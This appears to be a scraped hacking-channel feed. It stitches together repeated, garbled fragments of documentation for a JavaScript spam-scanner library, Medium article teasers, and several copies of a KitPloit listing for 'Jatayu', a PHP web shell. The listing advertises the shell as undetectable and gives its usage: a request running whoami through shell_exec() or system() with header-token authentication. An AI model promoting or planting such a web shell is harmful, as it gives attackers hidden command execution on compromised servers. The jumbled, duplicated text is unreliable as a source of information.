After parsing the language of the message, it will then use the package franc to attempt to determine the language of the message (as long as the message has at least 150 characters, which is configurable).
Most importantly the following types of tokens are replaced with cryptographically generated random hashes:
* Emojis (this includes Github-flavored emoji written in Markdown and all Unicode emojis)
* MAC addresses
* Credit cards
* Bitcoin addresses
* Phone numbers
* Hex colors
* Initialisms
* Abbreviations
* Email addresses
* Links
* Integers and floating point values
* Currencies
Note that the replacements for these types of tokens are whitelisted when stemming is performed.
Contractions are also expanded, e.g. “they’re” becomes two tokens, “they” and “are”, which are then stemmed accordingly.
This method will test the message against arbitrary spam-detection reasons, such as GTUBE.
Returns an Array of messages (if any) that indicate that parts of the message were detected to be spam-related for arbitrary reasons. You can also use this method with a second callback argument.
This method returns a Promise that resolves with an Array of messages (if any) that indicate that attachments parsed from the message were dangerous (e.g. contained trojans, viruses, malware, and/or other malicious threats). You can also use this method with a second callback argument.
ClamAV is used internally with this method, in order to scan the attachments (in parallel).
___________________________
@hacking_Attack
@Hacking_Video
0.0.0.0then it is considered to be phishing.We actually helped Cloudflare in August 2020 to update their documentation to note that this result of
0.0.0.0is returned for maliciously found content on FQDN and IP lookups. scanner.getExecutableResults(mail)Accepts a mailparser.simpleParserparsed mail Object.Note that this method detects (with respect to executables.json using “Content-Type” header detection, file extension detection, and magic number detection.
This method returns a Promise that resolves with an Array of messages (if any) that indicate that links and/or attachments parsed from the message were dangerous (e.g. contained executable files or links to executable files). You can also use this method with a second callback argument.
This method also takes into consideration that the file extension and name could have a homograph attack by using
punycode.toASCIIon the file name.It also scans against links in the message itself for links to executables.
scanner.getTokens(str, locale, isHTML = false)Accepts a str(String) and optional locale(String – valid i18n locale according to i18n-locales) and isHTMLparameters. If isHTMLis set to true, then that indicates that the String passed as stris in HTML format.Returns an Array of SHA-256 hashed tokenized and stemmed words, with respect to the passed, detected, or default locale. If
config.debugis true, then the values are not returned as hashed values (e.g. this is useful in testing and debugging).Note that this is “smart” in the sense it will parse the “Content-Language” header of the message, the
contentattribute of the HTML message’s , or the langattribute of .After parsing the language of the message, it will then use the package franc to attempt to determine the language of the message (as long as the message has at least 150 characters, which is configurable).
Most importantly the following types of tokens are replaced with cryptographically generated random hashes:
* Emojis (this includes Github-flavored emoji written in Markdown and all Unicode emojis)
* MAC addresses
* Credit cards
* Bitcoin addresses
* Phone numbers
* Hex colors
* Initialisms
* Abbreviations
* Email addresses
* Links
* Integers and floating point values
* Currencies
Note that the replacements for these types of tokens are whitelisted when stemming is performed.
Contractions are also expanded, e.g. “they’re” becomes two tokens, “they” and “are”, which are then stemmed accordingly.
scanner.getArbitraryResults(mail)Accepts a mailparser.simpleParserparsed mail Object.This method will test the message against arbitrary spam-detection reasons, such as GTUBE.
Returns an Array of messages (if any) that indicate that parts of the message were detected to be spam-related for arbitrary reasons. You can also use this method with a second callback argument.
scanner.getVirusResults(mail)Accepts a mailparser.simpleParserparsed mail Object.This method returns a Promise that resolves with an Array of messages (if any) that indicate that attachments parsed from the message were dangerous (e.g. contained trojans, viruses, malware, and/or other malicious threats). You can also use this method with a second callback argument.
ClamAV is used internally with this method, in order to scan the attachments (in parallel).
scanner.parseLocale(locale)Accepts a localeand returns it as a lowercase string with affixed localizations removed (e.g. en-USbecomes enand [...]___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
, which would in turn use Cloudflare for Family DNS. (using DNS over HTTPS with a fallback of dns.resolve4) – and if it returns 0.0.0.0then it is considered to be phishing. We actually helped Cloudflare in August 2020 to update their documentation to note…
en_USbecomes enas well). CachingBy default a
memoizeconfig option is passed with an infinite limit for adult-content and malware lookups.You can configure either the
memoizeor clientoptions, with memoizebeing an Object of options to pass to memoizee, and clientbeing an instance of Redis, such as one created with @ladjs/redis.Refer to the tests for examples of both implementations. If you go with the approach of
memoize, then you should set a sizeoption such as:const scanner = new SpamScanner({
// …
memoize: {
// since memoizee doesn’t support supplying mb or gb of cache size
// we can calculate how much the maximum could potentially be
// the max length of a domain name is 253 characters (bytes)
// and if we want to store up to 1 GB in memory, that’s
//
Math.floor(bytes('1GB') / 253)= 4244038 (domains)// note that this is per thread, so if you have 4 core server
// you will have 4 threads, and therefore need 4 GB of free memory
size: Math.floor(bytes(‘1GB’) / 253)
}
});
Note that in Forward Email we use the
clientapproach as we have multiple threads across multiple servers running, and in-memory caching would not be efficient. Download___________________________
@hacking_Attack
@Hacking_Video
Jatayu - Stealthy Stand Alone PHP Web Shell
JATAYU Stealthy Stand Alone PHP Web Shell FEATURES Http Header Based Authentication. 100% Undetectable. Exec Function Changer. Nothing Fancy USAGE GET /test/jatayu.php?fn=1&&cmd=whoamiHost : http://test.comAuthtoken : bb3b1a1f-0447-42a6-955a-88681fb88499 FUNCTIONS PARAMETER FUNCTION fn=1 Calls function shell_exec() fn=2 Calls function system() cmd=id Executes command GENERATE AUTHTOKEN <?php$r = unpack('v*', fread(fopen('/dev/random', 'r'),16));$apiKey = sprintf('%04x%04x-%04x-%04x-%04x-%04x%04x%04x', $r1, $r2, $r3, $r4 & 0x0fff | 0x4000, $r5 & 0x3fff | 0x8000, $r6, $r7, $r8);echo $apiKey;?> Download Jatayu
Read more...
JATAYU Stealthy Stand Alone PHP Web Shell FEATURES Http Header Based Authentication. 100% Undetectable. Exec Function Changer. Nothing Fancy USAGE GET /test/jatayu.php?fn=1&&cmd=whoamiHost : http://test.comAuthtoken : bb3b1a1f-0447-42a6-955a-88681fb88499 FUNCTIONS PARAMETER FUNCTION fn=1 Calls function shell_exec() fn=2 Calls function system() cmd=id Executes command GENERATE AUTHTOKEN <?php$r = unpack('v*', fread(fopen('/dev/random', 'r'),16));$apiKey = sprintf('%04x%04x-%04x-%04x-%04x-%04x%04x%04x', $r1, $r2, $r3, $r4 & 0x0fff | 0x4000, $r5 & 0x3fff | 0x8000, $r6, $r7, $r8);echo $apiKey;?> Download Jatayu
Read more...
Hacking on Medium
ऑनलाइन बैंकिंग सिस्टम को ट्रैक करके आपका बैंक अकाउंट भी हो सकता हैं खाली, न करे इस खतरनाक App को…
https://cdn-images-1.medium.com/max/600/0*pDRW6HO8TXNgyWdn
BUNE KNOWLEDGE
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
ऑनलाइन बैंकिंग सिस्टम को ट्रैक करके आपका बैंक अकाउंट भी हो सकता हैं खाली, न करे इस खतरनाक App को…
https://cdn-images-1.medium.com/max/600/0*pDRW6HO8TXNgyWdn
BUNE KNOWLEDGE
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
ऑनलाइन बैंकिंग सिस्टम को ट्रैक करके आपका बैंक अकाउंट भी हो सकता हैं खाली, न करे इस खतरनाक App को Install
BUNE KNOWLEDGE
Hacking on Medium
2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
https://cdn-images-1.medium.com/max/1189/1*h3LUcKrKLxlX0TNz5InfAw.png
Never attended a virtual networking event before? Your FAQs answered + Check our live demo here.
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
https://cdn-images-1.medium.com/max/1189/1*h3LUcKrKLxlX0TNz5InfAw.png
Never attended a virtual networking event before? Your FAQs answered + Check our live demo here.
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Medium
2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
Never attended a virtual networking event before? Your FAQs answered + Check our live demo here.
Hacking on Medium
Cybersecurity Sessions #4: Artificial Engagement and Ad Fraud
https://cdn-images-1.medium.com/max/2600/0*nuiGwsnjbnMXKueD
Continue reading on Netacea »
___________________________
@hacking_Attack
@Hacking_Video
Cybersecurity Sessions #4: Artificial Engagement and Ad Fraud
https://cdn-images-1.medium.com/max/2600/0*nuiGwsnjbnMXKueD
Continue reading on Netacea »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cybersecurity Sessions #4: Artificial Engagement and Ad Fraud
In this month’s episode, we’re talking about ad fraud and the role bots play in this lucrative space. Marketers care intensely about engagement and pay advertisers good money to get it, but how do…
Hacking on Medium
How ERC Standards Work, Part 1
https://cdn-images-1.medium.com/max/2025/1*PWK5Te6lu9-CbINSnYOO1Q.jpeg
Introduction
Continue reading on Immunefi »
___________________________
@hacking_Attack
@Hacking_Video
How ERC Standards Work, Part 1
https://cdn-images-1.medium.com/max/2025/1*PWK5Te6lu9-CbINSnYOO1Q.jpeg
Introduction
Continue reading on Immunefi »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How ERC Standards Work, Part 1
Introduction
Hacking on Medium
인슈어에이스 (InsurAce.io) 격주 업데이트 내역 (1월24일 — 2월6일)
https://cdn-images-1.medium.com/max/832/0*Do8F6U2RJhr1yr7k
지난 2주 동안 저희가 달성한 사항들을 아래 내용을 통해 확인해주세요.
Continue reading on 인슈어에이스 코리아 »
___________________________
@hacking_Attack
@Hacking_Video
인슈어에이스 (InsurAce.io) 격주 업데이트 내역 (1월24일 — 2월6일)
https://cdn-images-1.medium.com/max/832/0*Do8F6U2RJhr1yr7k
지난 2주 동안 저희가 달성한 사항들을 아래 내용을 통해 확인해주세요.
Continue reading on 인슈어에이스 코리아 »
___________________________
@hacking_Attack
@Hacking_Video
Medium
인슈어에이스 (InsurAce.io) 격주 업데이트 내역 (1월24일 — 2월6일)
지난 2주 동안 저희가 달성한 사항들을 아래 내용을 통해 확인해주세요.
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Jatayu - Stealthy Stand Alone PHP Web Shell
http://4.bp.blogspot.com/-Y6ST3XbnhRc/Yd2Yj8zJ-SI/AAAAAAAA8pc/viOgG_5Oya0NAw3v8AuLr3ZAgFv9VLATgCK4BGAYYCw/w640-h538/Jatayu_1_jatayu-image-763020.png
JATAYU
Stealthy Stand Alone PHP Web Shell
FEATURES
* Http Header Based Authentication.
* 100% Undetectable.
* Exec Function Changer.
* Nothing Fancy
USAGE
FUNCTIONS
PARAMETER FUNCTION fn=1 Calls function shell_exec() fn=2 Calls function system() cmd=id Executes command
GENERATE AUTHTOKEN
Download Jatayu
___________________________
@hacking_Attack
@Hacking_Video
Jatayu - Stealthy Stand Alone PHP Web Shell
http://4.bp.blogspot.com/-Y6ST3XbnhRc/Yd2Yj8zJ-SI/AAAAAAAA8pc/viOgG_5Oya0NAw3v8AuLr3ZAgFv9VLATgCK4BGAYYCw/w640-h538/Jatayu_1_jatayu-image-763020.png
JATAYU
Stealthy Stand Alone PHP Web Shell
FEATURES
* Http Header Based Authentication.
* 100% Undetectable.
* Exec Function Changer.
* Nothing Fancy
USAGE
GET /test/jatayu.php?fn=1&&cmd=whoami
Host : http://test.com
Authtoken : bb3b1a1f-0447-42a6-955a-88681fb88499
FUNCTIONS
PARAMETER FUNCTION fn=1 Calls function shell_exec() fn=2 Calls function system() cmd=id Executes command
GENERATE AUTHTOKEN
$r = unpack('v*', fread(fopen('/dev/random', 'r'),16));
$apiKey = sprintf('%04x%04x-%04x-%04x-%04x-%04x%04x%04x',
$r[1], $r[2], $r[3], $r[4] & 0x0fff | 0x4000,
$r[5] & 0x3fff | 0x8000, $r[6], $r[7], $r[8]);
echo $apiKey;
?>
Download Jatayu
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Jatayu - Stealthy Stand Alone PHP Web Shell
Jatayu - Stealthy Stand Alone PHP Web Shell
http://www.kitploit.com/2022/02/jatayu-stealthy-stand-alone-php-web.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/02/jatayu-stealthy-stand-alone-php-web.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Jatayu - Stealthy Stand Alone PHP Web Shell